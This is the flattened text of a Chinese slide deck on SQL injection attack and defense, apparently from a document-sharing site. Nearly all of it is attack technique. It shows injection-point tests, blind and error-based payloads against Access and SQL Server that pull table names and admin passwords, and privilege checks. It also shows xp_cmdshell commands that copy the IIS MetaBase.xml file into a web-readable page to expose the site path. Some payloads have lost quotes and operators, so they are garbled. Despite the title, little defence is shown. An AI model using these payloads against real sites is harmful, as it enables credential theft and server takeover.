SQL注入攻击与防御.pptVIP

SQL注入攻击与防御 SQL注入 SQL注入 这是一个Access数据库 SQL注入 静态网页： html或者htm，是一种静态的页面格式，不需要服务器解析其中的脚本。由浏览器如(IE、Chrome等)解析。 1.不依赖数据库 2.灵活性差，制作、更新、维护麻烦 3.交互性交差，在功能方面有较大的限制 4.安全，不存在SQL注入漏洞 动态网页： asp、aspx、php、jsp等，由相应的脚本引擎来解释执行，根据指令生成静态网页。 1.依赖数据库 2.灵活性好，维护简便 3.交互性好，功能强大 4.存在安全风险，可能存在SQL注入漏洞 SQL注入 SQL注入 SQL注入 如何判断？ 1.单引号判断 2.数字型注入判断 ①and 1=1 and 1=2 and 1 is null and 1 is not null and user0 ②参数进行运算 +1 -1 +→%2B 3.字符型注入判断 ① and 1=1 and 1=2 4.搜索型注入判断 ①test% and 1=1 and %= test% and 1=2 and %= SQL注入 如何攻击？ Access → 盲注 and exists(select * from table) and exists(select column from table) and (select top 1 len(id) from admin)0 and (select top 1 asc(mid(id,1,1)) from admin)X 无差异 → 构造差异 and iif((1=1),2,a)=2 and iif((1=2),2,a)=2 SQL注入 SqlServer 注入 → 三种权限 ①SA权限 可以利用MsSQL数据库自带的扩展存储（如：xp_cmdshell、xp_regwrite、sp_oacreate等）执行系统命令。 ②DB_OWNER权限 具有对当前数据库的修改、删除、新增数据表以及执行xp_regread、xp_dirtree等部分存储过程的权限。差异备份获取Webshell。 ③PUBLIC权限 权限最小，通常通过报错注入，盲注，从而获得后台管理员帐号密码。 SQL注入 如何判断权限？ 1.有错误回显 ①and user0 2.无错误回显 ①and 1=(select is_member(dbo)) //网页返回正常，说明数据库管理权限为sa ②and 1=(select is_member(db_owner)) //网页返回正常，说明数据库管理权限为db_owner ③and 1=(select is_member(public)) //网页返回正常，说明数据库管理权限为public SQL注入 SqlServer → 盲注 and exists(select * from table) and exists(select column from table) and (select top 1 len(id) from admin)0 and (select top 1 ascii(substring(password,1,1)) from admin)X SQL注入 SqlServer → 报错 当前数据库有哪些表 and (select top 1 name from sysobjects)=1 and (select top 1 name from sysobjects where name not in (admin,bigclass))=1 表中的字段 and (select top 1 col_name(object_id(admin),1) from sysobjects)=1 字段的值 and (select top 1 password from admin)=1 SQL注入 SqlServer(sa权限) → 关闭错误提示 获取Web路径 ①win2003 exec master..xp_cmdshell copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404.html-- ②win2000 exec master..xp_cmdshell copy C:\Winnt\system32\inetsrv\MetaBase.xml C:\Winnt\Help\iisHelp\common\404.html-- SQL注入